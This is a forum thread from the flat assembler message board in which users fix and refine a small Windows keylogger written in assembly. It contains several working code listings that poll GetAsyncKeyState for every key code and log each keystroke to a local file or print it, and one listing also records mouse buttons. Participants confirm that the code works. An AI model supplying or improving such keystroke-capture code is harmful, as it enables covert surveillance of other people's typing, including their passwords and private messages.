flat assembler
Message board for the users of flat assembler.
Windows: Very small and stupid keylogger still not work
revolution 27 May 2012, 11:31
The msvcrt library needs cinvoke.
BTW: The return value from GetAsyncKeyState is ever going to be -32767 (0xffff8001)? Where did you get that value from?

wsx 27 May 2012, 12:31
MSDN says: "If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous"
Referring to a SHORT means 0x8001
Still not work
Code:
    format PE GUI 4.0
    entry start
    include 'win32a.inc'

    start:
            cinvoke fopen, fName, mode      ;Open file
            mov     [hLog], eax             ;Store handle
            xor     ebx, ebx                ;Counter set to zero
    getkey:
            invoke  Sleep, 50               ;Wait 50ms
            inc     bl                      ;Increment. If it exceeds 255, it will set to zero
            invoke  GetAsyncKeyState, ebx
            and     ax, 0x8001
            cmp     ax, 0x8001              ;If the key is pressed
            jne     getkey
    write:
            cinvoke fputc, ebx, [hLog]      ;Write vkCode to the file
            jmp     getkey

    fName   db 'l09.txt',0
    mode    db 'a',0
    hLog    dd ?

    data import
            library kernel32, 'kernel32.dll',\
                    user32, 'user32.dll',\
                    msvcrt, 'msvcrt.dll'
            include 'api\kernel32.inc'
            include 'api\user32.inc'
            import msvcrt,\
                   fopen, 'fopen',\
                   fputc, 'fputc'
    end data

revolution 27 May 2012, 14:36
wsx wrote:
    MSDN says: "If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous"
You can use a debugger to verify values being returned.

wsx 27 May 2012, 15:19
In fact, I used the and operator (see above)
EDIT: Works! The problem was the Sleep. But w/o Sleep it steals a lot of CPU usage.

AsmGuru62 27 May 2012, 16:00
Try to do the loop on a separate thread.
This may decrease CPU usage.

revolution 27 May 2012, 16:31
With a 50ms sleep you are only reading keys at 20 per second. Perhaps better to read all 256 key codes in one loop and then sleep 50ms between loops.
Code:
    ;...
            xor     ebx, ebx                ;Counter set to zero
    getkey:
            invoke  GetAsyncKeyState, ebx
            and     ax, 0x8001
            cmp     ax, 0x8001              ;If the key is pressed
            jne     skipwrite
            cinvoke fputc, ebx, [hLog]      ;Write vkCode to the file
    skipwrite:
            inc     bl                      ;Increment. If it exceeds 255, it will set to zero
            jne     getkey
            invoke  Sleep, 50               ;Wait 50ms
            jmp     getkey
    ;...

typedef 27 May 2012, 18:19
Here's what I wrote some time ago
Code:
    format pe console 4.0
    include 'win32ax.inc'
    entry main

    section 'txt' code readable executable
    main:
            invoke  CreateThread,0,0,thread_logger,0,0,0
            invoke  WaitForSingleObject,eax,0FFFFFFFh
            ;Say what ?, no it won't reach here

    fmt db '0x%04X',10,0

    proc thread_logger,lpDat
            mov     dword[ebp-4],1
    reset:
            mov     dword[ebp-4],1
    for_loop:
            push    dword[ebp-4]
            call    [GetAsyncKeyState]
            cmp     eax,-32767
            jne     no_log
            push    dword[ebp-4]
            push    fmt
            call    [printf]
            add     esp, 8
    no_log:
            inc     dword[ebp-4]
            cmp     dword[ebp-4],100000000b
            jnz     for_loop
            push    09
            call    [Sleep]
            jmp     reset
    endp

    section '.idata' import data readable
    library user32,'user32.dll',\
            kernel32,'kernel32.dll',\
            msvc,'msvcrt.dll'
    import msvc,\
           printf,'printf'
    include 'api/user32.inc'
    include 'api/kernel32.inc'
It grabs mouse buttons too.

AdaS 07 Jun 2013, 09:43
This one works very well.

Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.
Website powered by rwasa.